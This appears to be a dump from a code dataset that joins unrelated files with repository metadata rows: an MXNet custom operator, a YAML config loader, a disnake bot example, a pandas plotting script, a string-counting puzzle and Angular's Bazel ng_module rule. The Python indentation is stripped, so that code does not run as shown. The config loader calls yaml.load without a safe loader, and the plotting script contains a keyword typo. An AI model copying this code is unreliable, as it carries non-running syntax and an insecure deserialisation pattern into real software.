assert wx == wy
zoom_grad_x, zoom_grad_y, zoom_grad_z = zoom_trans_grad_array[batch_idx]
if self.b_zoom_grad:
if self.b_inv_zoom:
grad_x = zoom_grad_x * wx
grad_y = zoom_grad_y * wy
else:
grad_x = zoom_grad_x / wx
grad_y = zoom_grad_y / wy
else:
grad_x = zoom_grad_x
grad_y = zoom_grad_y
grad_z = zoom_grad_z
trans_grad_array[batch_idx, 0] = grad_x
trans_grad_array[batch_idx, 1] = grad_y
trans_grad_array[batch_idx, 2] = grad_z
self.assign(in_grad[0], req[0], 0)
self.assign(in_grad[1], req[1], mx.ndarray.array(trans_grad_array, ctx=ctx))
@mx.operator.register("ZoomTrans")
class ZoomTransProp(mx.operator.CustomOpProp):
def __init__(self, b_inv_zoom="False", b_zoom_grad="False"):
super(ZoomTransProp, self).__init__(True)
self.b_inv_zoom = b_inv_zoom.lower() == "true"
self.b_zoom_grad = b_zoom_grad.lower() == "true"
def list_arguments(self):
input_list = ["zoom_factor", "trans_delta"]
return input_list
def list_outputs(self):
output_list = ["zoom_trans_delta"]
return output_list
def infer_shape(self, in_shape):
out_shape = [in_shape[1]]
return in_shape, out_shape, []
def infer_type(self, in_type):
dtype = in_type[0]
input_type = [dtype, dtype]
output_type = [dtype]
return input_type, output_type, []
def create_operator(self, ctx, shapes, dtypes):
return ZoomTransOperator(self.b_inv_zoom, self.b_zoom_grad)
if __name__ == "__main__":
# configs
thresh = 1e-3
step = 1e-4
ctx = mx.gpu(0)
batch_size = 8
# initialize layer
zoom_factor = mx.sym.Variable("zoom_factor")
trans_delta = mx.sym.Variable("trans_delta")
se3_trans = mx.sym.Variable("se3_trans")
proj2d = mx.sym.Custom(
zoom_factor=zoom_factor, trans_delta=trans_delta, name="updater", op_type="ZoomTrans", b_inv_zoom=False
)
v_zoom_factor = np.random.rand(batch_size, 4) * 2
v_zoom_factor[:, 1] = v_zoom_factor[:, 0]
v_trans_delta = np.random.rand(batch_size, 3) * 2
exe1 = proj2d.simple_bind(ctx=ctx, zoom_factor=v_zoom_factor.shape, trans_delta=v_trans_delta.shape)
# forward
exe1.arg_dict["zoom_factor"][:] = mx.ndarray.array(v_zoom_factor, ctx=ctx)
exe1.arg_dict["trans_delta"][:] = mx.ndarray.array(v_trans_delta, ctx=ctx)
import time
import matplotlib.pyplot as plt # noqa:F401
t = time.time()
exe1.forward(is_train=True)
zoom_trans_delta_mx = exe1.outputs[0].asnumpy()
zoom_trans_delta_py = np.copy(v_trans_delta)
for batch_idx in range(batch_size):
zoom_trans_delta_py[batch_idx, :2] /= v_zoom_factor[batch_idx, 0]
print("py: ", zoom_trans_delta_py[batch_idx])
print("mx: ", zoom_trans_delta_mx[batch_idx])
print(zoom_trans_delta_py - zoom_trans_delta_mx)
proj2d = mx.sym.Custom(
zoom_factor=zoom_factor, trans_delta=trans_delta, name="updater", op_type="ZoomTrans", b_inv_zoom=True
)
exe2 = proj2d.simple_bind(ctx=ctx, zoom_factor=v_zoom_factor.shape, trans_delta=v_trans_delta.shape)
exe2.arg_dict["zoom_factor"][:] = mx.ndarray.array(v_zoom_factor, ctx=ctx)
exe2.arg_dict["trans_delta"][:] = mx.ndarray.array(zoom_trans_delta_mx, ctx=ctx)
exe2.forward(is_train=True)
trans_delta_mx = exe2.outputs[0].asnumpy()
for batch_idx in range(batch_size):
print("py: ", v_trans_delta[batch_idx])
print("mx: ", trans_delta_mx[batch_idx])
print("trans_delta_mx-v_trans_delta:\n", trans_delta_mx - v_trans_delta)
| 39.503226 | 111 | 0.637433 |
08bd33517fad6e96e808dc841de7ed5dbafaa98c | 935 | py | Python | utils/load_config.py | jamaalhay/Final_Proj | 3f524a90fee5a3cb21466ab76f630d060792045d | [
"MIT"
] | 104 | 2018-05-16T07:15:29.000Z | 2022-03-08T09:28:02.000Z | utils/load_config.py | jamaalhay/Final_Proj | 3f524a90fee5a3cb21466ab76f630d060792045d | [
"MIT"
] | 4 | 2018-08-02T17:13:31.000Z | 2020-09-16T05:01:09.000Z | utils/load_config.py | jamaalhay/Final_Proj | 3f524a90fee5a3cb21466ab76f630d060792045d | [
"MIT"
] | 22 | 2018-05-30T10:13:49.000Z | 2021-12-14T15:43:12.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'han'
import sys
import yaml
import logging.config
def init_logging(config_path='config/logging_config.yaml'):
"""
initial logging module with config
:param config_path:
:return:
"""
try:
with open(config_path, 'r') as f:
config = yaml.load(f.read())
logging.config.dictConfig(config)
except IOError:
sys.stderr.write('logging config file "%s" not found' % config_path)
logging.basicConfig(level=logging.DEBUG)
def read_config(config_path='config/global_config.yaml'):
"""
store the global parameters in the project
:param config_path:
:return:
"""
try:
with open(config_path, 'r') as f:
config = yaml.load(f.read())
return config
except IOError:
sys.stderr.write('logging config file "%s" not found' % config_path)
exit(-1)
| 23.375 | 76 | 0.623529 |
9683bcdd18f7a7de84aa880aece554b9423aab8f | 1,268 | py | Python | examples/cog.py | LOCUS-TEAM/py-cord-components | 117302809482dfdcdfec0cfd9a7fa4fb1eb45671 | [
"MIT"
] | 1 | 2022-03-16T12:13:32.000Z | 2022-03-16T12:13:32.000Z | examples/cog.py | LOCUS-TEAM/py-cord-components | 117302809482dfdcdfec0cfd9a7fa4fb1eb45671 | [
"MIT"
] | null | null | null | examples/cog.py | LOCUS-TEAM/py-cord-components | 117302809482dfdcdfec0cfd9a7fa4fb1eb45671 | [
"MIT"
] | null | null | null | from disnake.ext.commands import command, Cog
from disnake_components import (
Button,
ButtonStyle,
Select,
SelectOption,
)
class ExampleCog(Cog):
def __init__(self, bot):
self.bot = bot
@command()
async def button(self, ctx):
async def callback(interaction):
await interaction.send(content="Yay")
await ctx.send(
"Button callbacks!",
components=[
self.bot.components_manager.add_callback(
Button(style=ButtonStyle.blue, label="Click this"), callback
),
],
)
@command()
async def select(self, ctx):
async def callback(interaction):
await interaction.send(content="Yay")
await ctx.send(
"Select callbacks!",
components=[
self.bot.components_manager.add_callback(
Select(
options=[
SelectOption(label="a", value="a"),
SelectOption(label="b", value="b"),
],
),
callback,
)
],
)
def setup(bot):
bot.add_cog(ExampleCog(bot))
| 24.862745 | 80 | 0.485804 |
8100f93e153abc9e46fc81ca35e2763c39e23790 | 1,063 | py | Python | Initial-codes.py | White-Brett/Nutrients-Prediction | bb2c3bfe3718b41fa8e31bcb19ce50c00aa85b66 | [
"CC0-1.0"
] | null | null | null | Initial-codes.py | White-Brett/Nutrients-Prediction | bb2c3bfe3718b41fa8e31bcb19ce50c00aa85b66 | [
"CC0-1.0"
] | null | null | null | Initial-codes.py | White-Brett/Nutrients-Prediction | bb2c3bfe3718b41fa8e31bcb19ce50c00aa85b66 | [
"CC0-1.0"
] | null | null | null | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
t_1= pd.read_excel("C:/Users/BrettData/Desktop/capst/fertilzer-use.xlsx", sheet_name=0, header=3, names=None, index_col=None, keep_default_na=False)
t1=t_1.iloc[7:59,1:5]
t1.plot()
plt.show()
t1.plot(kind='area')
plt.show()
t_2= pd.read_excel("C:/Users/BrettData/Desktop/capst/fertilizer-use.xlsx", sheet_name=1, header=3, names=None, index_col=None, keep_default_na=False)
t2=t_2.iloc[7:59,1:5]
t2.plot()
plt.show()
t2.plot(kind='area')
plt.show()
t_3=pd.read_excel("C:/Users/BrettData/Desktop/capst/fertiliser-use.xlsx", sheet_name=2, header=2, names=None, idex_col=None, keep_default_na=False)
tt3=t_3.iloc[7:59,1:9]
t3=tt3.drop(columns='Unnamed: 3')
t3.plot()
plt.show()
t3.plot(kind='area')
plt.show()
t_4=pd.read_excel("C:/Users/BrettData/Desktop/capst/fertiliser-use.xlsx", sheet_name=3, header=2, names=None, idex_col=None, keep_default_na=False)
tt4=t_4.iloc[7:35,1:9]
t4=tt4.drop(columns='Unnamed: 5')
t4.plot()
plt.show()
t4.plot(kind='area')
plt.show() | 36.655172 | 150 | 0.727187 |
fb16e53598ef76514035e6b8a297acc9237b56f9 | 840 | py | Python | horse_neigh_problem.py | lzmaths/leetcode | 0e457b74dcb07050a4612c1c209785829bde5898 | [
"MIT"
] | null | null | null | horse_neigh_problem.py | lzmaths/leetcode | 0e457b74dcb07050a4612c1c209785829bde5898 | [
"MIT"
] | null | null | null | horse_neigh_problem.py | lzmaths/leetcode | 0e457b74dcb07050a4612c1c209785829bde5898 | [
"MIT"
] | null | null | null | import sys
class Horse(object):
"""
given a string like: neineighghneigh, count the number of horses (neigh)
"""
def countHorse(self, s):
dic = {val: idx for idx, val in enumerate("neigh")}
counts = [0, 0, 0, 0, 0]
ans = 0
for idx, ch in enumerate(s):
counts[dic[ch]] += 1
if ch == 'n':
ans = max(ans, counts[0])
else:
if counts[dic[ch]-1] < counts[dic[ch]]:
return -1
if ch == 'h':
counts = [num-1 for num in counts]
return -1 if max(counts) != 0 else ans
horse = Horse()
print(horse.countHorse("neineighghneigh")) # expect 2
print(horse.countHorse("neineighghneighn")) # expect -1
print(horse.countHorse("neineighghnigh")) # expect -1
| 31.111111 | 76 | 0.511905 |
36006c2b5d67581caf4e93b2f32f71ec829bf547 | 31,053 | bzl | Python | packages/bazel/src/ng_module.bzl | Flusinerd/angular | 91934ebb5c7633e90b8f9ba8f958b4158259a87b | [
"MIT"
] | 1 | 2020-01-31T01:23:12.000Z | 2020-01-31T01:23:12.000Z | packages/bazel/src/ng_module.bzl | Flusinerd/angular | 91934ebb5c7633e90b8f9ba8f958b4158259a87b | [
"MIT"
] | null | null | null | packages/bazel/src/ng_module.bzl | Flusinerd/angular | 91934ebb5c7633e90b8f9ba8f958b4158259a87b | [
"MIT"
] | null | null | null | # Copyright Google Inc. All Rights Reserved.
#
# Use of this source code is governed by an MIT-style license that can be
# found in the LICENSE file at https://angular.io/license
"""Run Angular's AOT template compiler
"""
load(
":external.bzl",
"COMMON_ATTRIBUTES",
"COMMON_OUTPUTS",
"DEFAULT_API_EXTRACTOR",
"DEFAULT_NG_COMPILER",
"DEFAULT_NG_XI18N",
"DEPS_ASPECTS",
"NpmPackageInfo",
"TsConfigInfo",
"compile_ts",
"js_ecma_script_module_info",
"js_named_module_info",
"node_modules_aspect",
"ts_providers_dict_to_struct",
"tsc_wrapped_tsconfig",
)
_FLAT_DTS_FILE_SUFFIX = ".bundle.d.ts"
_R3_SYMBOLS_DTS_FILE = "src/r3_symbols.d.ts"
def is_ivy_enabled(ctx):
"""Determine if the ivy compiler should be used to by the ng_module.
Args:
ctx: skylark rule execution context
Returns:
Boolean, Whether the ivy compiler should be used.
"""
# TODO(josephperott): Remove after ~Feb 2020, to allow local script migrations
if "compile" in ctx.var and ctx.workspace_name == "angular":
fail(
msg = "Setting ViewEngine/Ivy using --define=compile is deprecated, please use " +
"--config=ivy or --config=view-engine instead.",
attr = "ng_module",
)
# This attribute is only defined in google's private ng_module rule and not
# available externally. For external users, this is effectively a no-op.
if hasattr(ctx.attr, "ivy") and ctx.attr.ivy == True:
return True
if ctx.var.get("angular_ivy_enabled", None) == "True":
return True
# Enable Angular targets extracted by Kythe Angular indexer to be compiled with the Ivy compiler architecture.
# TODO(ayazhafiz): remove once Ivy has landed as the default in g3.
if ctx.var.get("GROK_ELLIPSIS_BUILD", None) != None:
return True
# Return false to default to ViewEngine compiler
return False
def _compiler_name(ctx):
"""Selects a user-visible name depending on the current compilation strategy.
Args:
ctx: skylark rule execution context
Returns:
The name of the current compiler to be displayed in build output
"""
return "Ivy" if is_ivy_enabled(ctx) else "ViewEngine"
def _is_view_engine_enabled(ctx):
"""Determines whether Angular outputs will be produced by the current compilation strategy.
Args:
ctx: skylark rule execution context
Returns:
true iff the current compilation strategy will produce View Engine compilation outputs (such as
factory files), false otherwise
"""
return not is_ivy_enabled(ctx)
def _basename_of(ctx, file):
ext_len = len(".ts")
if file.short_path.endswith(".ng.html"):
ext_len = len(".ng.html")
elif file.short_path.endswith(".html"):
ext_len = len(".html")
return file.short_path[len(ctx.label.package) + 1:-ext_len]
# Return true if run with bazel (the open-sourced version of blaze), false if
# run with blaze.
def _is_bazel():
return not hasattr(native, "genmpm")
def _flat_module_out_file(ctx):
"""Provide a default for the flat_module_out_file attribute.
We cannot use the default="" parameter of ctx.attr because the value is calculated
from other attributes (name)
Args:
ctx: skylark rule execution context
Returns:
a basename used for the flat module out (no extension)
"""
if getattr(ctx.attr, "flat_module_out_file", False):
return ctx.attr.flat_module_out_file
return "%s_public_index" % ctx.label.name
def _should_produce_dts_bundle(ctx):
"""Should we produce dts bundles.
We only produce flatten dts outs when we expect the ng_module is meant to be published,
based on the value of the bundle_dts attribute.
Args:
ctx: skylark rule execution context
Returns:
true when we should produce bundled dts.
"""
# At the moment we cannot use this with ngtsc compiler since it emits
# import * as ___ from local modules which is not supported
# see: https://github.com/Microsoft/web-build-tools/issues/1029
return _is_view_engine_enabled(ctx) and getattr(ctx.attr, "bundle_dts", False)
def _should_produce_r3_symbols_bundle(ctx):
"""Should we produce r3_symbols bundle.
NGCC relies on having r3_symbols file. This file is located in @angular/core
And should only be included when bundling core in legacy mode.
Args:
ctx: skylark rule execution context
Returns:
true when we should produce r3_symbols dts.
"""
# iif we are compiling @angular/core with ngc we should add this addition dts bundle
# because ngcc relies on having this file.
# see: https://github.com/angular/angular/blob/84406e4d6d93b28b23efbb1701bc5ae1084da67b/packages/compiler-cli/src/ngcc/src/packages/entry_point_bundle.ts#L56
# todo: alan-agius4: remove when ngcc doesn't need this anymore
return _is_view_engine_enabled(ctx) and ctx.attr.module_name == "@angular/core"
def _should_produce_flat_module_outs(ctx):
"""Should we produce flat module outputs.
We only produce flat module outs when we expect the ng_module is meant to be published,
based on the presence of the module_name attribute.
Args:
ctx: skylark rule execution context
Returns:
true iff we should run the bundle_index_host to produce flat module metadata and bundle index
"""
return _is_bazel() and ctx.attr.module_name
# Calculate the expected output of the template compiler for every source in
# in the library. Most of these will be produced as empty files but it is
# unknown, without parsing, which will be empty.
def _expected_outs(ctx):
is_legacy_ngc = _is_view_engine_enabled(ctx)
devmode_js_files = []
closure_js_files = []
declaration_files = []
summary_files = []
metadata_files = []
factory_basename_set = depset([_basename_of(ctx, src) for src in ctx.files.factories])
for src in ctx.files.srcs + ctx.files.assets:
package_prefix = ctx.label.package + "/" if ctx.label.package else ""
# Strip external repository name from path if src is from external repository
# If src is from external repository, it's short_path will be ../<external_repo_name>/...
short_path = src.short_path if src.short_path[0:2] != ".." else "/".join(src.short_path.split("/")[2:])
if short_path.endswith(".ts") and not short_path.endswith(".d.ts"):
basename = short_path[len(package_prefix):-len(".ts")]
if (len(factory_basename_set.to_list()) == 0 or basename in factory_basename_set.to_list()):
if _generate_ve_shims(ctx):
devmode_js = [
".ngfactory.js",
".ngsummary.js",
".js",
]
else:
devmode_js = [".js"]
# Only ngc produces .json files, they're not needed in Ivy.
if is_legacy_ngc:
summaries = [".ngsummary.json"]
metadata = [".metadata.json"]
else:
summaries = []
metadata = []
else:
devmode_js = [".js"]
if not _is_bazel():
devmode_js += [".ngfactory.js"]
summaries = []
metadata = []
elif is_legacy_ngc and short_path.endswith(".css"):
basename = short_path[len(package_prefix):-len(".css")]
devmode_js = [
".css.shim.ngstyle.js",
".css.ngstyle.js",
]
summaries = []
metadata = []
else:
continue
filter_summaries = ctx.attr.filter_summaries
closure_js = [f.replace(".js", ".mjs") for f in devmode_js if not filter_summaries or not f.endswith(".ngsummary.js")]
declarations = [f.replace(".js", ".d.ts") for f in devmode_js]
devmode_js_files += [ctx.actions.declare_file(basename + ext) for ext in devmode_js]
closure_js_files += [ctx.actions.declare_file(basename + ext) for ext in closure_js]
declaration_files += [ctx.actions.declare_file(basename + ext) for ext in declarations]
summary_files += [ctx.actions.declare_file(basename + ext) for ext in summaries]
if not _is_bazel():
metadata_files += [ctx.actions.declare_file(basename + ext) for ext in metadata]
dts_bundles = None
if _should_produce_dts_bundle(ctx):
# We need to add a suffix to bundle as it might collide with the flat module dts.
# The flat module dts out contains several other exports
# https://github.com/angular/angular/blob/84406e4d6d93b28b23efbb1701bc5ae1084da67b/packages/compiler-cli/src/metadata/index_writer.ts#L18
# the file name will be like 'core.bundle.d.ts'
dts_bundles = [ctx.actions.declare_file(ctx.label.name + _FLAT_DTS_FILE_SUFFIX)]
if _should_produce_r3_symbols_bundle(ctx):
dts_bundles.append(ctx.actions.declare_file(_R3_SYMBOLS_DTS_FILE.replace(".d.ts", _FLAT_DTS_FILE_SUFFIX)))
# We do this just when producing a flat module index for a publishable ng_module
if _should_produce_flat_module_outs(ctx):
flat_module_out = _flat_module_out_file(ctx)
devmode_js_files.append(ctx.actions.declare_file("%s.js" % flat_module_out))
closure_js_files.append(ctx.actions.declare_file("%s.mjs" % flat_module_out))
bundle_index_typings = ctx.actions.declare_file("%s.d.ts" % flat_module_out)
declaration_files.append(bundle_index_typings)
if is_legacy_ngc:
metadata_files.append(ctx.actions.declare_file("%s.metadata.json" % flat_module_out))
else:
bundle_index_typings = None
# TODO(alxhub): i18n is only produced by the legacy compiler currently. This should be re-enabled
# when ngtsc can extract messages
if is_legacy_ngc and _is_bazel():
i18n_messages_files = [ctx.actions.declare_file(ctx.label.name + "_ngc_messages.xmb")]
elif is_legacy_ngc:
# write the xmb file to blaze-genfiles since that path appears in the translation console keys
i18n_messages_files = [ctx.new_file(ctx.genfiles_dir, ctx.label.name + "_ngc_messages.xmb")]
else:
i18n_messages_files = []
return struct(
closure_js = closure_js_files,
devmode_js = devmode_js_files,
declarations = declaration_files,
summaries = summary_files,
metadata = metadata_files,
dts_bundles = dts_bundles,
bundle_index_typings = bundle_index_typings,
i18n_messages = i18n_messages_files,
)
# Determines if we need to generate View Engine shims (.ngfactory and .ngsummary files)
def _generate_ve_shims(ctx):
# we are checking the workspace name here, because otherwise this would be a breaking change
# (the shims used to be on by default)
# we can remove this check once angular/components and angular/angular-cli repos no longer depend
# on the presence of shims, or if they explicitly opt-in to their generation via ng_modules' generate_ve_shims attr
return _is_bazel() and _is_view_engine_enabled(ctx) or (
getattr(ctx.attr, "generate_ve_shims", False) == True or ctx.workspace_name != "angular"
)
def _ngc_tsconfig(ctx, files, srcs, **kwargs):
generate_ve_shims = _generate_ve_shims(ctx)
outs = _expected_outs(ctx)
is_legacy_ngc = _is_view_engine_enabled(ctx)
if "devmode_manifest" in kwargs:
expected_outs = outs.devmode_js + outs.declarations + outs.summaries + outs.metadata
else:
expected_outs = outs.closure_js
angular_compiler_options = {
"enableResourceInlining": ctx.attr.inline_resources,
"generateCodeForLibraries": False,
"allowEmptyCodegenFiles": True,
"generateNgFactoryShims": True if generate_ve_shims else False,
"generateNgSummaryShims": True if generate_ve_shims else False,
# Summaries are only enabled if Angular outputs are to be produced.
"enableSummariesForJit": is_legacy_ngc,
"enableIvy": is_ivy_enabled(ctx),
"fullTemplateTypeCheck": ctx.attr.type_check,
# In Google3 we still want to use the symbol factory re-exports in order to
# not break existing apps inside Google. Unlike Bazel, Google3 does not only
# enforce strict dependencies of source files, but also for generated files
# (such as the factory files). Therefore in order to avoid that generated files
# introduce new module dependencies (which aren't explicitly declared), we need
# to enable external symbol re-exports by default when running with Blaze.
"createExternalSymbolFactoryReexports": (not _is_bazel()),
# FIXME: wrong place to de-dupe
"expectedOut": depset([o.path for o in expected_outs]).to_list(),
"_useHostForImportGeneration": (not _is_bazel()),
}
if _should_produce_flat_module_outs(ctx):
angular_compiler_options["flatModuleId"] = ctx.attr.module_name
angular_compiler_options["flatModuleOutFile"] = _flat_module_out_file(ctx)
angular_compiler_options["flatModulePrivateSymbolPrefix"] = "_".join(
[ctx.workspace_name] + ctx.label.package.split("/") + [ctx.label.name, ""],
)
return dict(tsc_wrapped_tsconfig(ctx, files, srcs, **kwargs), **{
"angularCompilerOptions": angular_compiler_options,
})
def _collect_summaries_aspect_impl(target, ctx):
results = depset(target.angular.summaries if hasattr(target, "angular") else [])
# If we are visiting empty-srcs ts_library, this is a re-export
srcs = ctx.rule.attr.srcs if hasattr(ctx.rule.attr, "srcs") else []
# "re-export" rules should expose all the files of their deps
if not srcs and hasattr(ctx.rule.attr, "deps"):
for dep in ctx.rule.attr.deps:
if (hasattr(dep, "angular")):
results = depset(dep.angular.summaries, transitive = [results])
return struct(collect_summaries_aspect_result = results)
_collect_summaries_aspect = aspect(
implementation = _collect_summaries_aspect_impl,
attr_aspects = ["deps"],
)
# Extra options passed to Node when running ngc.
_EXTRA_NODE_OPTIONS_FLAGS = [
# Expose the v8 garbage collection API to JS.
"--node_options=--expose-gc",
# Show ~full stack traces, instead of cutting off after 10 items.
"--node_options=--stack-trace-limit=100",
# Give 4 GB RAM to node to allow bigger google3 modules to compile.
"--node_options=--max-old-space-size=4096",
]
def ngc_compile_action(
ctx,
label,
inputs,
outputs,
messages_out,
tsconfig_file,
node_opts,
locale = None,
i18n_args = [],
dts_bundles_out = None,
compile_mode = "prodmode"):
"""Helper function to create the ngc action.
This is exposed for google3 to wire up i18n replay rules, and is not intended
as part of the public API.
Args:
ctx: skylark context
label: the label of the ng_module being compiled
inputs: passed to the ngc action's inputs
outputs: passed to the ngc action's outputs
messages_out: produced xmb files
tsconfig_file: tsconfig file with settings used for the compilation
node_opts: list of strings, extra nodejs options.
locale: i18n locale, or None
i18n_args: additional command-line arguments to ngc
dts_bundles_out: produced flattened dts file
Returns:
the parameters of the compilation which will be used to replay the ngc action for i18N.
"""
is_legacy_ngc = _is_view_engine_enabled(ctx)
mnemonic = "AngularTemplateCompile"
progress_message = "Compiling Angular templates (%s - %s) %s" % (_compiler_name(ctx), compile_mode, label)
if locale:
mnemonic = "AngularI18NMerging"
supports_workers = "0"
progress_message = ("Recompiling Angular templates (ngc - %s) %s for locale %s" %
(compile_mode, label, locale))
else:
supports_workers = str(int(ctx.attr._supports_workers))
arguments = (list(_EXTRA_NODE_OPTIONS_FLAGS) +
["--node_options=%s" % opt for opt in node_opts])
# One at-sign makes this a params-file, enabling the worker strategy.
# Two at-signs escapes the argument so it's passed through to ngc
# rather than the contents getting expanded.
if supports_workers == "1":
arguments += ["@@" + tsconfig_file.path]
else:
arguments += ["-p", tsconfig_file.path]
arguments += i18n_args
ctx.actions.run(
progress_message = progress_message,
mnemonic = mnemonic,
inputs = inputs,
outputs = outputs,
arguments = arguments,
executable = ctx.executable.compiler,
execution_requirements = {
"supports-workers": supports_workers,
},
)
if is_legacy_ngc and messages_out != None:
# The base path is bin_dir because of the way the ngc
# compiler host is configured. Under Blaze, we need to explicitly
# point to genfiles/ to redirect the output.
# See _expected_outs above, where the output path for the message file
# is conditional on whether we are in Bazel.
message_file_path = messages_out[0].short_path if _is_bazel() else "../genfiles/" + messages_out[0].short_path
ctx.actions.run(
inputs = inputs,
outputs = messages_out,
executable = ctx.executable.ng_xi18n,
arguments = (_EXTRA_NODE_OPTIONS_FLAGS +
[tsconfig_file.path] +
[message_file_path]),
progress_message = "Extracting Angular 2 messages (ng_xi18n)",
mnemonic = "Angular2MessageExtractor",
)
if dts_bundles_out != None:
# combine the inputs and outputs and filter .d.ts and json files
filter_inputs = [f for f in inputs.to_list() + outputs if f.path.endswith(".d.ts") or f.path.endswith(".json")]
if _should_produce_flat_module_outs(ctx):
dts_entry_points = ["%s.d.ts" % _flat_module_out_file(ctx)]
else:
dts_entry_points = [ctx.attr.entry_point.label.name.replace(".ts", ".d.ts")]
if _should_produce_r3_symbols_bundle(ctx):
dts_entry_points.append(_R3_SYMBOLS_DTS_FILE)
ctx.actions.run(
progress_message = "Bundling DTS (%s) %s" % (compile_mode, str(ctx.label)),
mnemonic = "APIExtractor",
executable = ctx.executable.api_extractor,
inputs = filter_inputs,
outputs = dts_bundles_out,
arguments = [
tsconfig_file.path,
",".join(["/".join([ctx.bin_dir.path, ctx.label.package, f]) for f in dts_entry_points]),
",".join([f.path for f in dts_bundles_out]),
],
)
if not locale and not ctx.attr.no_i18n:
return struct(
label = label,
tsconfig = tsconfig_file,
inputs = inputs,
outputs = outputs,
compiler = ctx.executable.compiler,
)
return None
def _filter_ts_inputs(all_inputs):
# The compiler only needs to see TypeScript sources from the npm dependencies,
# but may need to look at package.json and ngsummary.json files as well.
return [
f
for f in all_inputs
if f.path.endswith(".js") or f.path.endswith(".ts") or f.path.endswith(".json")
]
def _compile_action(
ctx,
inputs,
outputs,
dts_bundles_out,
messages_out,
tsconfig_file,
node_opts,
compile_mode):
# Give the Angular compiler all the user-listed assets
file_inputs = list(ctx.files.assets)
if (type(inputs) == type([])):
file_inputs.extend(inputs)
else:
# inputs ought to be a list, but allow depset as well
# so that this can change independently of rules_typescript
# TODO(alexeagle): remove this case after update (July 2019)
file_inputs.extend(inputs.to_list())
if hasattr(ctx.attr, "node_modules"):
file_inputs.extend(_filter_ts_inputs(ctx.files.node_modules))
# If the user supplies a tsconfig.json file, the Angular compiler needs to read it
if hasattr(ctx.attr, "tsconfig") and ctx.file.tsconfig:
file_inputs.append(ctx.file.tsconfig)
if TsConfigInfo in ctx.attr.tsconfig:
file_inputs += ctx.attr.tsconfig[TsConfigInfo].deps
# Also include files from npm fine grained deps as action_inputs.
# These deps are identified by the NpmPackageInfo provider.
for d in ctx.attr.deps:
if NpmPackageInfo in d:
# Note: we can't avoid calling .to_list() on sources
file_inputs.extend(_filter_ts_inputs(d[NpmPackageInfo].sources.to_list()))
# Collect the inputs and summary files from our deps
action_inputs = depset(
file_inputs,
transitive = [
dep.collect_summaries_aspect_result
for dep in ctx.attr.deps
if hasattr(dep, "collect_summaries_aspect_result")
],
)
return ngc_compile_action(ctx, ctx.label, action_inputs, outputs, messages_out, tsconfig_file, node_opts, None, [], dts_bundles_out, compile_mode)
def _prodmode_compile_action(ctx, inputs, outputs, tsconfig_file, node_opts):
outs = _expected_outs(ctx)
return _compile_action(ctx, inputs, outputs + outs.closure_js, None, outs.i18n_messages, tsconfig_file, node_opts, "prodmode")
def _devmode_compile_action(ctx, inputs, outputs, tsconfig_file, node_opts):
outs = _expected_outs(ctx)
compile_action_outputs = outputs + outs.devmode_js + outs.declarations + outs.summaries + outs.metadata
_compile_action(ctx, inputs, compile_action_outputs, outs.dts_bundles, None, tsconfig_file, node_opts, "devmode")
def _ts_expected_outs(ctx, label, srcs_files = []):
# rules_typescript expects a function with two or more arguments, but our
# implementation doesn't use the label(and **kwargs).
_ignored = [label, srcs_files]
return _expected_outs(ctx)
def ng_module_impl(ctx, ts_compile_actions):
"""Implementation function for the ng_module rule.
This is exposed so that google3 can have its own entry point that re-uses this
and is not meant as a public API.
Args:
ctx: the skylark rule context
ts_compile_actions: generates all the actions to run an ngc compilation
Returns:
the result of the ng_module rule as a dict, suitable for
conversion by ts_providers_dict_to_struct
"""
is_legacy_ngc = _is_view_engine_enabled(ctx)
providers = ts_compile_actions(
ctx,
is_library = True,
compile_action = _prodmode_compile_action,
devmode_compile_action = _devmode_compile_action,
tsc_wrapped_tsconfig = _ngc_tsconfig,
outputs = _ts_expected_outs,
)
outs = _expected_outs(ctx)
if is_legacy_ngc:
providers["angular"] = {
"summaries": outs.summaries,
"metadata": outs.metadata,
}
providers["ngc_messages"] = outs.i18n_messages
if is_legacy_ngc and _should_produce_flat_module_outs(ctx):
if len(outs.metadata) > 1:
fail("expecting exactly one metadata output for " + str(ctx.label))
providers["angular"]["flat_module_metadata"] = struct(
module_name = ctx.attr.module_name,
metadata_file = outs.metadata[0],
typings_file = outs.bundle_index_typings,
flat_module_out_file = _flat_module_out_file(ctx),
)
if outs.dts_bundles != None:
providers["dts_bundles"] = outs.dts_bundles
return providers
def _ng_module_impl(ctx):
ts_providers = ng_module_impl(ctx, compile_ts)
# Add in new JS providers
# See design doc https://docs.google.com/document/d/1ggkY5RqUkVL4aQLYm7esRW978LgX3GUCnQirrk5E1C0/edit#
# and issue https://github.com/bazelbuild/rules_nodejs/issues/57 for more details.
ts_providers["providers"].extend([
js_named_module_info(
sources = ts_providers["typescript"]["es5_sources"],
deps = ctx.attr.deps,
),
js_ecma_script_module_info(
sources = ts_providers["typescript"]["es6_sources"],
deps = ctx.attr.deps,
),
# TODO: Add remaining shared JS providers from design doc
# (JSModuleInfo) and remove legacy "typescript" provider
# once it is no longer needed.
])
return ts_providers_dict_to_struct(ts_providers)
local_deps_aspects = [node_modules_aspect, _collect_summaries_aspect]
# Workaround skydoc bug which assumes DEPS_ASPECTS is a str type
[local_deps_aspects.append(a) for a in DEPS_ASPECTS]
NG_MODULE_ATTRIBUTES = {
"srcs": attr.label_list(allow_files = [".ts"]),
# Note: DEPS_ASPECTS is already a list, we add the cast to workaround
# https://github.com/bazelbuild/skydoc/issues/21
"deps": attr.label_list(
doc = "Targets that are imported by this target",
aspects = local_deps_aspects,
),
"assets": attr.label_list(
doc = ".html and .css files needed by the Angular compiler",
allow_files = [
".css",
# TODO(alexeagle): change this to ".ng.html" when usages updated
".html",
],
),
"factories": attr.label_list(
allow_files = [".ts", ".html"],
mandatory = False,
),
"filter_summaries": attr.bool(default = False),
"type_check": attr.bool(default = True),
"inline_resources": attr.bool(default = True),
"no_i18n": attr.bool(default = False),
"compiler": attr.label(
doc = """Sets a different ngc compiler binary to use for this library.
The default ngc compiler depends on the `@npm//@angular/bazel`
target which is setup for projects that use bazel managed npm deps that
fetch the @angular/bazel npm package. It is recommended that you use
the workspace name `@npm` for bazel managed deps so the default
compiler works out of the box. Otherwise, you'll have to override
the compiler attribute manually.
""",
default = Label(DEFAULT_NG_COMPILER),
executable = True,
cfg = "host",
),
"ng_xi18n": attr.label(
default = Label(DEFAULT_NG_XI18N),
executable = True,
cfg = "host",
),
"_supports_workers": attr.bool(default = True),
}
NG_MODULE_RULE_ATTRS = dict(dict(COMMON_ATTRIBUTES, **NG_MODULE_ATTRIBUTES), **{
"tsconfig": attr.label(allow_single_file = True),
"node_modules": attr.label(
